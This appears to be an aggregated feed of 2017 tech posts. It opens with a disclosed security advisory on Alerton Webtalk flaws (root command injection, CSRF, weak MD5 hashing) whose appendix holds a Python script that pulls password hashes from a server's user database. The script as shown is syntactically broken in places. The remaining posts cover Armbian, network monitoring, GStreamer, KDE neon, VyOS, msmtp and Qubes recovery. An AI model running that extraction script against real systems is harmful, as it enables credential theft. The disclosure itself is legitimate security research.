Any user granted the “configure webtalk” permission can execute commands as the root user on the underlying server. There appears to be some effort of filtering command strings (such as rejecting commands containing pipes and redirection operators) but this is inadequate. Using this vulnerability, an attacker can add an SSH key to the root user’s authorized_keys file.

Host: test-host
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:50.0) Gecko/20100101
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: NID=...; _SID_=...; OGPC=...:
Connection: close
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Date: Mon, 23 Jan 2017 20:34:26 GMT
Server: Apache
cache-control: no-cache
Set-Cookie: _SID_=...; Path=/;
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 2801

uid=0(root) gid=500(webtalk) groups=500(webtalk)

Recommendation: User input should be avoided to shell commands. If this is not possible, shell commands should be properly escaped. Consider using one of the functions from the subprocess module without the shell=True parameter.

Webtalk-03 - Cross-Site Request Forgery

Severity: High

The entire Webtalk administrative interface lacks any controls against Cross-Site Request Forgery. This allows an attacker to execute administrative changes without access to valid credentials. Combined with the above vulnerability, this allows an attacker to gain root access without any credentials.

Recommendation: Implement CSRF tokens on all state-changing actions.

Webtalk-04 - Insecure Credential Hashing

Severity: Moderate

Password hashes in the userprofile.db database are hashed by concatenating the password with the username (e.g., PASSUSER) and performing a plain MD5 hash. No salts or iterative hashing is performed. This does not follow password hashing best practices and makes for highly practical offline attacks.

Recommendation: Use scrypt, bcrypt, or argon2 for storing password hashes.

Webtalk-05 - Login Flow Defeats Password Hashing

Severity: Moderate

Password hashing is performed on the client side, allowing for the replay of password hashes from Webtalk-01. While this only works on the mobile login interface (“PDA” interface, /~webtalk/pda/pda_login.psp), the resulting session is able to access all resources and is functionally equivalent to a login through the Java-based login flow.

Recommendation: Perform hashing on the server side and use TLS to protect secrets in transit.


  • 2017/01/?? - Issues Discovered
  • 2017/01/26 - Issues Reported to security () honeywell com
  • 2017/01/30 - Initial response from Alerton confirming receipt.
  • 2017/02/04 - Alerton reports Webtalk is EOL and issues will not be fixed.
  • 2017/04/26 - This disclosure


These issues were discovered by David Tomaschik of the Google ISA Assessments team.

Appendix A: Script to Extract Hashes

import requests
import sys
import ConfigParser
import StringIO
import sqlite3
import tempfile
import os

def get_webtalk_ini(base_url):
    """Get the webtalk.ini file and parse it."""
    url = '%s/~webtalk/webtalk.ini' % base_url
    r = requests.get(url)
    if r.status_code != 200:
        raise RuntimeError('Unable to get webtalk.ini: %s', url)
    buf = StringIO.StringIO(r.text)
    parser = ConfigParser.RawConfigParser()
    return parser

def get_db_path(base_url, config):
    rep = config.get('bacnet', 'rep')
    job = config.get('bacnet', 'job')
    url = '%s/~webtalk/bts/%s/%s/userprofile.db'
    return url % (base_url, rep, job)

def load_db(url):
    """Load and read the db."""
    r = requests.get(url)
    if r.status_code != 200:
        raise RuntimeError('Unable to get %s.' % url)
    tmpfd, tmpname = tempfile.mkstemp(suffix='.db')
    tmpf = os.fdopen(tmpfd, 'w')
    con = sqlite3.connect(tmpname)
    cur = con.cursor()
    cur.execute("SELECT UserID, UserPassword FROM tblPassword")
    results = cur.fetchall()
    return results

def users_for_server(base_url):
    if '://' not in base_url:
        base_url = 'http://%s' % base_url
    ini = get_webtalk_ini(base_url)
    db_path = get_db_path(base_url, ini)
    return load_db(db_path)

if __name__ == '__main__':
    for host in sys.argv[1:]:
            users = users_for_server(host)
        except Exception as ex:
            sys.stderr.write('%s\n' % str(ex))
        for u in users:
            print '%s:%s' % (u[0], u[1])

27 April, 2017 07:00AM

April 26, 2017

hackergotchi for ARMBIAN



Ubuntu server – legacy kernel
  .torrent (recommended) ?
Command line interface – server usage scenarios.


Ubuntu server – mainline kernel
Command line interface – server usage scenarios.


  Other images     Review     Board family info     Forums     HW details     Card burning tool

Known issues

Legacy kernel images (all boards) (default branch)

  • Arm64 browsers (Firefox, Chromium, Iceweasel) may crash frequently. Armhf versions of these browsers should be used instead (Iceweasel and Firefox preinstalled in desktop images should be of the right architecture out of the box)
  • HDMI output supports only limited number of predefined resolutions
  • Hardware accelerated video decoding supports only limited number of video formats

Board: Pine64/Pine64+

  • Gigabit Ethernet performance: on some boards was confirmed as hardware issue, though the legacy kernel received a workaround that may help on some boards.
  • Gigabit Ethernet performance: setting TX/RX delays manually in /boot/armbianEnv may improve performance on some boards. Refer to this github issue for the details.


Quick start | Documentation


Make sure you have a good & reliable SD card and a proper power supply. Archives can be uncompressed with 7-Zip on Windows, Keka on OS X and 7z on Linux (apt-get install p7zip-full). RAW images can be written with Etcher (all OS).


Insert SD card into a slot and power the board. First boot takes around 3 minutes then it might reboot and you will need to wait another one minute to login. This delay is because system creates 128Mb emergency SWAP and expand SD card to it’s full capacity. Worst case scenario boot (with DHCP) takes up to 35 seconds.


Login as root on HDMI / serial console or via SSH and use password 1234. You will be prompted to change this password at first login. Next you will be asked to create a normal user account that is sudo enabled (beware of default QWERTY keyboard settings at this stage).

26 April, 2017 10:12PM by igorpecovnik

Cumulus Linux

Data center network monitoring best practices part 1: Metrics and alerts

One of the least loved areas of any data center network is monitoring. This is ironic because at its core, the network has two goals: 1) Get packets from A to B 2) Make sure packets got from A to B. It is not uncommon in the deployments I’ve seen for the monitoring budget to be effectively $0, and generally, an organization’s budget also reflects their priorities. Despite spending thousands, or even hundreds of thousands, of dollars on networking equipment to facilitate goal #1 from above, there is often little money, thought and time spent in pursuit of Goal #2. In the next several paragraphs I’ll go into some basic data center network monitoring best practices that will work with any budget.

It is not hard to see why monitoring the data center network can be a daunting task. Monitoring your network, just like designing your network, takes a conscious plan of action. Tooling in the monitoring space today is highly fragmented with over 100+ “best of breed” tools that each accommodate a specific use case. Just evaluating all the tools would be a full time job. A recent Big Panda Report and their video overview of it (38 mins) is quite enlightening. They draw some interesting conclusions from the 1700+ IT respondents:

  • 78% said obtaining budget for monitoring tools is a challenge
  • 79% said reducing the noise from all the tools is a challenge

The main takeaway here is that a well-thought out monitoring plan, using network monitoring best practices, implemented with modern open-source tooling can alleviate both of these issues.

Setting a monitoring strategy

Before we talk about tooling, we need to set a strategy for ourselves. There are two fields to be considered when setting a strategy:

  • Metrics
  • Alerts

Metrics are used for trend analysis and can be linked to alerts when crossing over a threshold. Alerts can be triggered off multiple source, including events, logs or metric thresholds.

Identifying your metrics

The right monitoring strategy requires the team to identify which metrics are important for your business. Metrics can take many forms but generally a metric is some quantifiable measure that is used to track and assess the status of a specific infrastructure component or application. Typically these metrics are collected and compared continually over time.

Examples of low-level metrics include bytes on an interface, CPU utilization on the switch or total number of routes installed in the routing table. But they could be even more high-level such as the number of requests to an application per minute or the amount of time required by the application to service each client request.

For a non-exhaustive example of different low-level metrics that can be monitored with Cumulus Networks check out our “Monitoring Best Practices” documentation.

The challenge with a good monitoring strategy is to identify and monitor just the metrics that are important to reduce the overhead going into your monitoring tooling and ultimately the amount of information that needs to be stored, trended and evaluated by your team.

Taking action on metrics

Once your team has decided on the right metrics for your organization the question becomes what to do with the collected metric data. Some metrics only makes sense for long-term trending, others have a more immediate impact on network performance and require immediate attention from team members. These time-sensitive metrics cover a different class of monitoring tooling called alerting.

In the same way that the team needs to decide on the right metrics to monitor there needs to be some thought given to what alerts should be generated from these metrics. Do I really want an alert if an interface that faces a desktop computer goes down or do I only care if the uplink fails?

Thoughtful alerting is the apex of a good monitoring design because it allows the monitoring system to actually provide direct value to your operations staff. The team should only get alerts for things that need immediate action. Because 79% of folks say they are overwhelmed by noise from their monitoring tools there should be no false positives. False positives desensitize the team from listening to the monitoring system over time.

It makes sense here to start with a minimalist approach, start with no alerts and add the alerts that the team directly needs to be aware of. You may find that metrics need to be added to support the alerts needed by the team.

In the next couple blog posts, we’ll dive into network monitoring best practices a bit deeper and explore both alerting and modern tooling in greater detail. Stay tuned for more!

The post Data center network monitoring best practices part 1: Metrics and alerts appeared first on Cumulus Networks Blog.

26 April, 2017 09:56PM by Eric Pulvino

hackergotchi for Ubuntu developers

Ubuntu developers

Sebastian Dröge: RTP for broadcasting-over-IP use-cases in GStreamer: PTP, RFC7273 for Ravenna, AES67, SMPTE 2022 & SMPTE 2110

It’s that time of year again where the broadcast industry gathers at NAB show, which seems like a good time to me to revisit some frequently asked questions about GStreamer‘s support for various broadcasting related standards

Even more so as at this year’s NAB there seems to be a lot of hype about the new SMPTE 2110 standard, which defines how to transport and synchronize live media streams over IP networks, and which fortunately (unlike many other attempts) is based on previously existing open standards like RTP.

While SMPTE 2110 is the new kid on the block here, there are various other standards based on similar technologies. There’s for example AES67 by the Audio Engineering Society for audio-only, Ravenna which is very similar, the slightly older SMPTE 2022 and VSF TR3/4 by the Video Services Forum.

Other standards, like MXF for storage of media (which is supported by GStreamer since years), are also important in the broadcasting world, but let’s ignore these other use-cases here for now and focus on streaming live media.

Media Transport

All of these standards depend on RTP in one way or another, use PTP or similar services for synchronization and are either fully (as in the case of AES67/Ravenna) supported by GStreamer already or at least to a big part, with the missing parts being just some extensions to existing code.

There’s not really much to say here about the actual media transport as GStreamer has had solid support for RTP for a very long time and has a very flexible and feature-rich RTP stack that includes support for many optional extensions to RTP and is successfully used for broadcasting scenarios, real-time communication (e.g. WebRTC and SIP) and live-video streaming as required by security cameras for example.

Over the last months and years, many new features have been added to GStreamer’s RTP stack for various use-cases and the code was further optimized, and thanks to all that the amount of work needed for new standards based on RTP, like the beforementioned ones, is rather limited. For AES67 no additional work was needed to support it, for example.

The biggest open issue for the broadcasting-related standards currently is the need of further optimizations for high-resolution, high-framerate streaming of video. In these cases we currently run into performance problems due to the high amount of packets per second, and some serious optimizations would be needed. However there are already various ideas how to improve this situation that are just waiting to be implemented.


I previously already wrote about PTP in GStreamer, which is supported in GStreamer for synchronizing media and that support is now merged and has been included since the 1.8 release. In addition to that NTP is also supported now since 1.8.

In theory other clocks could also be used in some scenarios, like clocks based on a GPS receiver, but that’s less common and not yet supported by GStreamer. Nonetheless all the infrastructure for supporting arbitrary clocks exists, so adding these when needed is not going to be much work.

Clock Signalling

One major new feature that was added in the last year, for the 1.10 release of GStreamer, was support for RFC7273. While support for PTP in theory allows you to synchronize media properly if both sender and receiver are using the same clock, what was missing before is a way to signal what this specific clock exactly is and what offsets have to be applied. This is where RFC7273 becomes useful, and why it is used as part of many of the standards mentioned before. It defines a common interface for specifying this information in the SDP, which commonly is used to describe how to set up an RTP session.

The support for that feature was merged for the 1.10 release and is readily available.

Help needed? Found bugs or missing features?

While the basics are all implemented in GStreamer, there are still various missing features for optional extensions of the before mentioned standards or even, in some cases, required parts of the standard. In addition to that some optimizations may still be required, depending on your use-case.

If you run into any problems with the existing code, or need further features for the various standards implemented, just drop me a mail.

GStreamer is already used in the broadcasting world in various areas, but let’s together make sure that GStreamer can easily be used as a batteries-included solution for broadcasting use-cases too.

26 April, 2017 04:01PM


Einblicke von Martin Jordan in die digitale Transformation der Britischen Regierung

Kurzfristig gelang es dem Team E- und Open-Government der Stadt München, Martin Jordan für einen Vortrag im Direktorium der Stadt München zu gewinnen. Geplant war ein Erfahrungsaustausch über die elektronische Verwaltung an der Schnittstelle zwischen … Weiterlesen

Der Beitrag Einblicke von Martin Jordan in die digitale Transformation der Britischen Regierung erschien zuerst auf Münchner IT-Blog.

26 April, 2017 01:32PM by Stefan Döring

hackergotchi for Ubuntu developers

Ubuntu developers

Harald Sitter: KDE neon CMake Package Validation

In KDE neon‘s constant quest of raising the quality bar of KDE software and neon itself, I added a new tool to our set of quality assurance tools. CMake Package QA is meant to ensure that find_package() calls on CMake packages provided by config files (e.g. FooConfig.cmake files) do actually work.

The way this works is fairly simple. For just about every bit of KDE software we have packaged, we install the individual deb packages including dependencies one after the other and run a dummy CMakeLists.txt on any *Config.cmake file in that package.

As an example, we have libkproperty3-dev as a deb package. It contains KPropertyWidgetsConfig.cmake. We install the package and its dependencies, construct a dummy file, and run cmake on it during our cmake linting.

cmake_minimum_required(VERSION 3.0)
find_package(KPropertyWidgets REQUIRED)

This tests that running KPropertyWidgetsConfig.cmake works, ensuring that the cmake code itself is valid (bad syntax, missing includes, what have you…) and that our package is sound and including all dependencies it needs (to for example meet find_dependency macro calls).

As it turns out libkproperty3-dev is of insufficient quality. What a shame.

26 April, 2017 01:03PM

hackergotchi for VyOS


Donations and other ways to support VyOS

Hello, community!

We got many requests about how you can donate, we decided open this possibility to those who asked

After all, this is direct support to the project that all you offer, and we constantly need a support of all types.

As was mentioned before, you can contribute in many ways:

But if you would like to contribute via donation you are welcome to do so!

Raised money will be used for project needs like:

  • Documentation development
  • Tutorials and training courses creation
  • Artwork creation
  • Travels of project maintainers to relevant events 
  • Event organization
  • Videos
  • Features development 
  • Popularization of VyOS
  • Servers
  • Lab
  • Software
  • Hardware

Of course, that is not a complete list of needs that project have but most visible.

Find below most convenient way for donation

If you need invoice, please drop me email or ping me on chat

Thank you!

Bitcoin: 1PpUa61FytNSWhTbcVwZzfoE9u12mQ65Pe

PayPal Subscription

PayPal One time donation

26 April, 2017 12:44PM by Yuriy Andamasov

hackergotchi for Ubuntu developers

Ubuntu developers

Joe Barker: Configuring msmtp on Ubuntu 16.04

I previously wrote an article around configuring msmtp on Ubuntu 12.04, but as I hinted at in my previous post that sort of got lost when the upgrade of my host to Ubuntu 16.04 went somewhat awry. What follows is essentially the same post, with some slight updates for 16.04. As before, this assumes that you’re using Apache as the web server, but I’m sure it shouldn’t be too different if your web server of choice is something else.

I use msmtp for sending emails from this blog to notify me of comments and upgrades etc. Here I’m going to document how I configured it to send emails via a Google Apps account, although this should also work with a standard Gmail account too.

To begin, we need to install 3 packages:
sudo apt-get install msmtp msmtp-mt ca-certificates
Once these are installed, a default config is required. By default msmtp will look at /etc/msmtprc, so I created that using vim, though any text editor will do the trick. This file looked something like this:

# Set defaults.
# Enable or disable TLS/SSL encryption.
tls on
tls_starttls on
tls_trust_file /etc/ssl/certs/ca-certificates.crt
# Setup WP account's settings.
host smtp.gmail.com
port 587
auth login
password <PASSWORD>
logfile /var/log/msmtp/msmtp.log

account default : <MSMTP_ACCOUNT_NAME>

Any of the uppercase items (i.e. <PASSWORD>) are things that need replacing specific to your configuration. The exception to that is the log file, which can of course be placed wherever you wish to log any msmtp activity/warnings/errors to.

Once that file is saved, we’ll update the permissions on the above configuration file — msmtp won’t run if the permissions on that file are too open — and create the directory for the log file.

sudo mkdir /var/log/msmtp
sudo chown -R www-data:adm /var/log/msmtp
sudo chmod 0600 /etc/msmtprc

Next I chose to configure logrotate for the msmtp logs, to make sure that the log files don’t get too large as well as keeping the log directory a little tidier. To do this, we create /etc/logrotate.d/msmtp and configure it with the following file. Note that this is optional, you may choose to not do this, or you may choose to configure the logs differently.

/var/log/msmtp/*.log {
rotate 12

Now that the logging is configured, we need to tell PHP to use msmtp by editing /etc/php/7.0/apache2/php.ini and updating the sendmail path from
sendmail_path =
sendmail_path = "/usr/bin/msmtp -C /etc/msmtprc -a <MSMTP_ACCOUNT_NAME> -t"
Here I did run into an issue where even though I specified the account name it wasn’t sending emails correctly when I tested it. This is why the line account default : <MSMTP_ACCOUNT_NAME> was placed at the end of the msmtp configuration file. To test the configuration, ensure that the PHP file has been saved and run sudo service apache2 restart, then run php -a and execute the following

mail ('personal@email.com', 'Test Subject', 'Test body text');

Any errors that occur at this point will be displayed in the output so should make diagnosing any errors after the test relatively easy. If all is successful, you should now be able to use PHPs sendmail (which at the very least WordPress uses) to send emails from your Ubuntu server using Gmail (or Google Apps).

I make no claims that this is the most secure configuration, so if you come across this and realise it’s grossly insecure or something is drastically wrong please let me know and I’ll update it accordingly.

26 April, 2017 09:32AM

Alan Pope: April Snapcraft Docs Day

Continuing Snapcraft Docs Days

In March we had our first Snapcraft Docs Day on the last Friday of the month. It was fun and successful so we're doing it again this Friday, 28th April 2017. Join us in #snapcraft on Rocket Chat and on the snapcraft forums

Flavour of the month

This month's theme is 'Flavours', specifically Ubuntu Flavours. We've worked hard to make the experience of using snapcraft to build snaps as easy as possible. Part of that work was to ensure it works as expected on all supported Ubuntu flavours. Many of us run stock Ubuntu and despite our best efforts, may not have caught certain edge cases only apparent on flavours.

If you're running an Ubuntu flavour, then we'd love to hear how we did. Do the tutorials we've written work as expected? Is the documentation clear, unambiguous and accurate? Can you successfully create a brand new snap and publish it to the store using snapcraft on your flavour of choice?

Soup of the day

On Friday we'd love to hear about your experiences on an Ubuntu flavour of doing things like:-

Happy Hour

On the subject of snapping other people's projects. Here's some tips we think you may find useful.

  • Look for new / interesting open source projects on github trending projects such as trending python projects or trending go projects, or perhaps recent show HN submissions.
  • Ask in #snapcraft on Rocket Chat if others have already started on a snap, to avoid duplication & collaborate.
  • Avoid snapping frameworks, libraries, but focus more atomic tools, utilities and full applications
  • Start small. Perhaps choose command line or server-based applications, as they're often easier for the beginner than full fat graphical desktop applications.
  • Pick applications written in languages you're familiar with. Although not compulsory, it can help when debugging
  • Contribute upstream. Once you have a prototype or fully working snap, contribute the yaml to the upstream project, so they can incorporate it in their release process
  • Consider uploading the application to the store for wider testing, but be prepared to hand the application over to the upstream developer if they request it

Finally, if you're looking for inspiration, join us in #snapcraft on Rocket Chat and ask! We've all got our own pet projects we'd like to see snapped.

Food for thought

Repeated from last time, here's a handy reference of the projects we work on with their repos and bug trackers:-

Project Source Issue Tracker
Snapd Snapd on GitHub Snapd bugs on Launchpad
Snapcraft Snapcraft on GitHub Snapcraft bugs on Launchpad
Snapcraft Docs Snappy-docs on GitHub Snappy-docs issues on GitHub
Tutorials Tutorials on GitHub Tutorials issues on GitHub

26 April, 2017 08:40AM

hackergotchi for Qubes


Compromise recovery on Qubes OS

Occasionally fuckups happen, even with Qubes (although not as often as some think).

What should we – users or admins – do in such a situation? Patch, obviously. But is that really enough? What good is patching your system if it might have already been compromised a week earlier, before the patch was released, when an adversary may have learned of the bug and exploited it?

That’s an inconvenient question for many of us – computer security professionals – to answer. Usually we would mutter something about Raising the Bar(TM), the high costs of targeted attacks, attackers not wanting to burn 0-days, or only nation state actors being able to afford such attacks, and that in case one is on their list of targets, the game is over anyway and no point in fighting. Plus some classic cartoon.

While the above line of defense might work (temporarily), it really doesn’t provide for much comfort, long term, I think. We need better answers and better solutions. This post, together with a recently introduced feature in Qubes OS 3.2 and (upcoming) 4.0, is an attempt to offer such a solution.

We start first with a relatively easy problem, namely recovery of a (potentially) compromised AppVM(s). Then we tackle the significantly more serious problem which is handling the situation of a (potentially) compromised system, including subverted dom0, hypervisor, BIOS and all the other software. We discuss how Qubes OS can help handle all these cases, below.

Digression about detecting compromises

But before we move on, I’d like to say a few words about detecting system compromises, be that compromises of VMs (which actually are also systems in themselves) or the whole physical system.

The inconvenient and somehow embarrassing truth for us – the malware experts – is that there does not exist any reliable method to determine if a given system is not compromised. True, there is a number of conditions that can warn us that the system is compromised, but there is no limit on the number of checks that a system must pass in order to be deemed “clean”.

This means that in many situations it might be reasonable to perform “compromise recovery” for a system or system(s), even though we might not have any explicit indication of a compromise. Instead, the only justification might be some gut feeling, some unusual “coincidence” just observed (e.g. sudden spectacular series of successes of our competitor), or knowledge about a fatal vulnerability that we just learnt could have been reliably used to attack our systems. Or maybe you left your laptop in a hotel room and various entrance indicators suggest somebody paid you a visit?

I’m writing this all to actually make two important points:

  1. As we don’t have reliable indicators when to initiate the recovery procedure, it’s desirable for the procedure to be as simple and cheap to perform as possible. Because we might want to do it often, and just in case.

  2. Instead of expecting the recovery procedure to reveal compromises details (and let us do the attribution, and catch the bad guys), instead we might want to shift our goals and expect something else: namely that once we performed it, we will start over from a clean system.

Handling AppVM compromises

Let’s discuss first how can we deal with a (potentially) compromised AppVM (or some system VM).

How come a VM might become compromised? Perhaps because of some bug in a Web browser or email client, opening a maliciously prepared PDF file, installation of some backdoored software, or gazillion of other potential issues that might lead to a compromise of an AppVM.

It’s worth reiterating here that the Qubes OS security model assumes AppVM compromises as something that will happen on a regular basis.

I believe that, even if all the sharpest vulnerability researchers could spend all their lives auditing all the application software we use, and finally identify all the relevant bugs, this process would never catch up with the pace at which new bugs are being added by application developers into new apps, or even into newer versions of the apps previously audited.

Additionally, I don’t believe that advances in so called “safe languages” or anti-exploitation technology could significantly change this landscape. These approaches, while admittedly effective in many situations, especially against memory-corruption-based vulnerabilities, cannot address other broad categories of software vulnerabilities, such as security bugs in application logic, nor stop malicious (or compromised) vendors from building backdoors intentionally into their software.

Reverting AppVM’s root image back to a clean known state

Qubes OS offers a very convenient mechanism to revert root filesystems of any AppVM back to a known good state. All the user needs to do is to restart the specific AppVM. This trick works thanks to the Qubes OS template mechanism.

It’s difficult to overestimate convenience and simplicity of this mechanism. Something strange just happened while browsing the Web? PDF viewer crashed while opening an attachment? File manager (or the whole VM) crashed while navigating to some just-downloaded ZIP-unpacked directory? Just reboot the AppVM! If you’re slow at clicking, need to shutdown and start a heavy application like a Web browser, and your CPU is of moderate speed, the whole operation will take about 30 seconds.

The pesky home directory

Reverting the root filesystem of the AppVM to a good known (trusted) state might be a neat trick, but for more sophisticated attacks, especially attacks targeting Qubes OS, it might not be enough.

This is because, besides the root filesystem, each AppVM has also what we call a “private” image (volume). This is where e.g. the content of the home directory (i.e. the user data) is stored. And for obvious reasons the home directory is something that needs to persist between AppVM restarts.

Unfortunately it’s not quite correct to say that the AppVM’s private image contains only “user data”. In reality it might contain also scripts and programs, including such that would be auto-executed upon each new AppVM start. Bash’s ~/.bashrc and ~/.bash_profile, or files in .config/autostart/*.desktop are prime examples, but there are many more. E.g. some configuration files in various Web browser profiles (e.g. prefs.js). And there are also Qubes-specific configuration and customization scripts (found in the /rw/config/ directory). An attacker can use any of these, and probably many more, depending on which other applications the user regularly uses, to persist her code within a specific AppVM. Additionally, an attacker can potentially use bugs in any of the software that is always, or often, run in the AppVM, such as a bug in Nautilus (file manager) or some PDF viewer.

Qubes offers three mechanisms how to deal with this problem:

  1. It is possible to mount one VM’s private image as a volume to another AppVM. One can then run whatever malware scanner or investigative software in that other AppVM. This operation is indeed very easy to do:

    [joanna@dom0 ~]$ qvm-block -A --ro admin-ir dom0:/var/lib/qubes/appvms/personal/private.img
    [root@admin-ir user]# mount -o ro /dev/xvdi /mnt/personal/
  2. By using Qubes secure file copy operation. Specifically the user might copy the whole home directory to a new AppVM, and then analyze, verify and start using (the verified) data in a new, non-compromised AppVM:

    [user@personal ~]$ qvm-copy-to-vm admin-ir /home/user/
    [user@admin-ir ~]$ ll ~/QubesIncoming/personal/user/
    total 36
    drwxr-xr-x 2 user user 4096 Dec  2 21:22 Desktop
    drwxr-xr-x 2 user user 4096 Dec  2 21:22 Documents
    drwxr-xr-x 2 user user 4096 Dec  2 21:22 Downloads
    drwxr-xr-x 2 user user 4096 Dec  2 21:22 Music
    drwxr-xr-x 2 user user 4096 Dec  2 21:22 Pictures
    drwxr-xr-x 2 user user 4096 Dec  2 21:22 Public
    drwx------ 5 user user 4096 Mar  9 13:10 QubesIncoming
    drwxr-xr-x 2 user user 4096 Dec  2 21:22 Templates
    drwxr-xr-x 2 user user 4096 Dec  2 21:22 Videos
  3. By having “cleaning” scripts in the root filesystem (so they could execute before the private image gets mounted/used) which, when activated, would sanitize, clean and/or remove most (all?) of the scripts that are in the home directory. Assuming such cleaning script is effective (i.e. does not misses any place in the home directory which would be used to persist attacker’s code), the user might just 1) upgrade the vulnerable software in the template, 2) restart the AppVM. It’s worth stressing that, as the upgrading of the vulnerable software takes place in a TemplateVM (instead of the compromised AppVM), the attacker who exploited the vulnerability previously, has no way of blocking the upgrade.

The first method described above, while most familiar to those used to do forensic analysis on traditional systems, is also the least secure, because it exposes the target AppVM (i.e. the one to which we mount the private image of the compromised AppVM) to potential attacks on the volume and filesystem parsing code.

The second method (Qubes inter-VM file copy) avoids this problem. But, of course, some method of sanitization or scanning of the files copied from the compromised machine will be needed (remember that the compromised AppVM might have sent whatever it felt like sending!). Some users might want to run more traditional, AV-like scanners, while others might want to employ approaches similar to e.g. one used by Qubes PDF converters. Perhaps in some scenarios even better approaches could be used, e.g. verifying code repositories by checking digital signatures.

The third method has not been officially merged into Qubes yet, and it is unclear how effective (complete) it could be in practice, but some discussions about it, accompanied by an early implementation, can be found on the mailing list.

Compromise recovery for individual AppVM

Handling other system VMs compromises

Much easier to recover should be various ServiceVMs, such as USB- and net- VMs. In most cases these do not require any significant user customisations or data (maybe except for saved list of WiFi networks and their passphrases). In this case their recovery should be as easy as just removing and recreating the VM in question.

One could go even further and imagine that all ServiceVMs should be Disposable VMs, i.e. without any persistent storage (no private image). In this case full recovery would be achieved by simply restarting the VM. Thanks to the Admin API that is coming in Qubes 4.0 this approach might become easy to implement and might get implemented in the 4.1 or later version.

Recovering from a full Qubes system compromise

So far we’ve been discussing situations when one or more Qubes VMs are compromised, and we have seen how Qubes’ compartmentalized architecture helps us to recover from such unpleasant situations reasonably well.

But occasionally we learn about bugs that allow an attacker to compromise the whole Qubes OS system. In the nearly 8 years of Qubes OS, there have been at least 4 such fatal bugs, and this justifies having a designated procedure for reacting to such cases. We look at this method below.

Introducing the “paranoid” backup restore mode

In order to provide a meaningful option for users to recover from a full Qubes system compromise, we have introduced “Paranoid Mode” for the backup restore procedure. (The mode is also known as “Plan B” mode.)

The idea behind this is very simple: the user makes a backup of a compromised machine (running the backup creation on this very machine), then restores it on a newly installed, clean Qubes system.

The catch is that this special mode of backup restoration must assume that the backup material might have been maliciously prepared in order to exploit the backup restoring code and attempt to take over the new system.

Naturally, backup encryption and HMAC-based integrity protection becomes meaningless in this case, as the attacker who has compromised the original system on which the backup was created might have been able to get her malicious backup content properly signed with the valid user passphrase. We discuss how we made our backup restoration code (reasonably) resistant to such attacks below.

Now, without further ado, a quick sample of how this new mode is used in practice:

[user@dom0 ~]$ qvm-backup-restore --help
Usage: qvm-backup-restore [options] <backup-dir> [vms-to-be-restored ...]

  -d APPVM, --dest-vm=APPVM
                        Specify VM containing the backup to be restored
  -e, --encrypted	The backup is encrypted
  -p PASS_FILE, --passphrase-file=PASS_FILE
                        Read passphrase from file, or use '-' to read from
  -z, --compressed	The backup is compressed
  --paranoid-mode, --plan-b
                        Treat the backup as untrusted, don't restore things
                        potentially compromising security, even when properly
                        authenticated. See man page for details.

[user@dom0 ~]$ qvm-backup-restore --paranoid-mode --ignore-missing -d sys-usb /media/disk/backup.bin
Please enter the passphrase to verify and (if encrypted) decrypt the backup:
Checking backup content...
Extracting data: 1.0 MiB to restore
paranoid-mode: not restoring dom0 home

The following VMs are included in the backup:

                       name |  type |            template | updbl |         netvm |  label |
                 {test-net} |   Net |           fedora-24 |       |           n/a |    red | <-- Original template was 'fedora-23'
      [test-template-clone] |   Tpl |                 n/a |   Yes | *sys-firewall |  black |
          test-standalonevm |   App |                 n/a |   Yes | *sys-firewall |   blue |
                  test-work |   App |           fedora-24 |       |      test-net |  green | <-- Original template was 'fedora-23'
           {test-testproxy} | Proxy |           fedora-24 |       |             - | yellow | <-- Original template was 'fedora-23'
 test-custom-template-appvm |   App | test-template-clone |       | *sys-firewall |  green |
               test-testhvm |   HVM |                 n/a |   Yes | *sys-firewall | orange |
    test-template-based-hvm |   HVM |    test-hvmtemplate |       | *sys-firewall |    red |
         [test-hvmtemplate] |   Tpl |                 n/a |   Yes | *sys-firewall |  green |

The above VMs will be copied and added to your system.
Exisiting VMs will NOT be removed.
Do you want to proceed? [y/N] y
-> Done. Please install updates for all the restored templates.
-> Done.
[user@dom0 ~]$

After the backup restoration we end up with a fresh system that consists of:

  1. Clean dom0, hypervisor, and default system/service VM,

  2. some number of potentially compromised VMs (those restored from the untrusted system),

  3. some number of clean, non-compromised AppVMs.

The user can immediately start using either of the AppVMs, even the compromised ones, without endangering any other VMs.

Overview of Qubes system compromise recovery

However, a few things will not get restored when running in paranoid mode, and these include:

  • Any dom0 modifications, such as the wallpaper and other desktop environment customizations (it’s impossible to sanitize these and securely restore, yet these should be relatively easy to recreate with “a few clicks”),

  • qrexec policies and firewall rules (what good could be these policies if coming from compromised system anyway?)

  • all non-basic properties for the restored VMs, such as PCI device assignments.

It should be clear that any attempt to restore any of the above might easily jeopardize the whole idea of paranoid restoration procedure.

Qubes OS vs conventional systems?

It’s worth stressing the difference that Qubes architecture makes here. In case of a traditional monolithic OS, it is, of course, also possible to migrate to a newly installed, clean system. But users of these systems face two challenges:

  1. First, in order to copy the user data from an old, compromised system, one needs to somehow mount some kind of mass storage device to a new, clean system. Typically this would be a USB disk, or a directly-connected SATA-like disk. But this action exposes the clean system to a rather significant attack vector coming from 1) the malicious USB device, 2) malformed partitions or other volume meta-data, and 3) malformed filesystem metadata. All these attacks would require a bug in the clean system’s USB, storage, or filesystem parsing stack, of course. But these bugs might be completely different bugs than the bugs we might suspect the attacker used to infect the first system (as a reminder: we perform all these recovery procedures because we learned about some fatal bug in some critical software, e.g. a Web browser for a monolithic system, or Xen for Qubes).

  2. But even if we neglect the potential attacks discussed in the previous point, still we face a very uncomfortable situation: perhaps we just successfully transferred all the data from the old system, but how could we securely use them now? If we “click-open” any of the files, we endanger to compromise our freshly installed system, for the attacker might have modified any or all of our files after the compromise. This would bring us back to the point we started. A traditional solution would be to restore from an earlier, before-the-compromise-happened backup. Only that, as discussed above, we often lack any good tools to determined when exactly did the compromise happen. Not to mention we would need to sacrifice all the recent work when implementing this strategy.

The Qubes mechanism described in this article has been designed to prevent any of these scenarios.

Under-the-hood of the backup restore “paranoid mode”

So, how have we designed and implemented this paranoid backup restore mode on Qubes OS? To understand our design decision, as well as the current limitations, it is helpful to realize that we want to avoid attacks coming on three different levels of abstractions:

  1. System-level attacks (e.g. malicious USB, malformed filesystem metadata)
  2. Backup parsing-level (e.g. XML parser for qubes.xml file)
  3. Backup interpretation-level (“semantic” level)

